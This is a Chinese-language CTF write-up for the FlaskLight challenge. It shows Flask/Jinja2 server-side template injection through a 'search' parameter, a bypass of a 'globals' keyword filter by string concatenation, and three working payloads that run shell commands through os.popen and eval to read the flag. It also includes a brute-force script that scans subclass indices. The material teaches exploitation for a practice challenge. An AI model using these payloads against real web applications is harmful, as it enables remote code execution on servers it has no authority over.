[CSCCTF 2019 Qual]FlaskLight 1

目录

题目分析

看题目名称,可能是flask模板注入

查看页面源码,提示get方式传入search

text 复制代码
payload:?search={{7*7}}

返回49,确定是模板注入

模板注入相关知识

判断模板类型

继承关系


魔术方法

python 复制代码
__class__    # 查找当前类型的所属对象
__base__     # 沿着父子类的关系往上走一个
__mro__      # 查找当前对象继承的所有继承类
__subclasses__()    # 查找父类下所有的子类
__init__        # 查看类是否重载,重载指的是程序在运行时就加载好了这个模块到内存中,如果出现wrapper字眼,说明没有重载
__globals__        # 函数会以字典的形式返回当前对象的全部全局变量

常用注入模块

解法一:使用config

text 复制代码
payload:?search={{config}}

没ban环境变量,那么直接开始做题

text 复制代码
payload:?search={{config.__class__.__init__.__.globals__['os'].popen('whoami').read()}}

报错,应该是设置了过滤,经过逐个输入,确定过滤了global

过滤绕过

有许多绕过方法:

+拼接

~拼接

过滤器


寻找falg

我们使用+拼接即可绕过

text 复制代码
payload:?search={{config.__class__.__init__['__glo'+'bals__']['os'].popen('ls').read()}}

看看flasklight

text 复制代码
payload:?search={{config.__class__.__init__['__glo'+'bals__']['os'].popen('ls /flasklight').read()}}

查看flag

text 复制代码
payload:?search={{config.__class__.__init__['__glo'+'bals__']['os'].popen(''cat /flasklight/coomme_geeeett_youur_flek'').read()}}

解法二:在已加载os模块的子类中直接调用os模块

python脚本查找加载os模块的子类

python 复制代码
import requests
url = input('请输入url链接:')
for i in range(500):
    data = "?search={{().__class__.__base__.__subclasses__()["+str(i)+"].__init__['__glo'+'bals__']}}"
    url += data;
    try:
        response = requests.get(url)
        # print(response.text)
        if 'os.py' in response.text:
            print(i)
            break
    except:
        pass

结果

解题

寻找flag的过程省略

text 复制代码
payload:{{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('cat /flasklight/coomme_geeeett_youur_flek').read()}}

解法三:内建函数eval执行命令

python脚本寻找命令位置

python 复制代码
import requests
url = input('请输入url链接:')
for i in range(500):
    data = "?search={{().__class__.__base__.__subclasses__()["+str(i)+"].__init__['__glo'+'bals__']}}"
    url += data;
    try:
        response = requests.get(url)
        # print(response.text)
        if 'eval' in response.text:
            print(i)
            break
    except:
        pass

结果

解题

text 复制代码
payload:{{[].__class__.__base__.__subclasses__()[58].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('cat /flasklight/coomme_geeeett_youur_flek ').read()")}}
相关推荐
TF男孩8 分钟前
ARQ:一款低成本的消息队列,实现每秒万级吞吐
后端·python·消息队列
该用户已不存在5 小时前
Mojo vs Python vs Rust: 2025年搞AI,该学哪个?
后端·python·rust
站大爷IP7 小时前
Java调用Python的5种实用方案:从简单到进阶的全场景解析
python
白帽黑客沐瑶13 小时前
【网络安全就业】信息安全专业的就业前景(非常详细)零基础入门到精通,收藏这篇就够了
网络·安全·web安全·计算机·程序员·编程·网络安全就业
用户83562907805113 小时前
从手动编辑到代码生成:Python 助你高效创建 Word 文档
后端·python
c8i13 小时前
python中类的基本结构、特殊属性于MRO理解
python
liwulin050613 小时前
【ESP32-CAM】HELLO WORLD
python
Doris_202314 小时前
Python条件判断语句 if、elif 、else
前端·后端·python
Doris_202314 小时前
Python 模式匹配match case
前端·后端·python
这里有鱼汤14 小时前
Python量化实盘踩坑指南:分钟K线没处理好,小心直接亏钱!
后端·python·程序员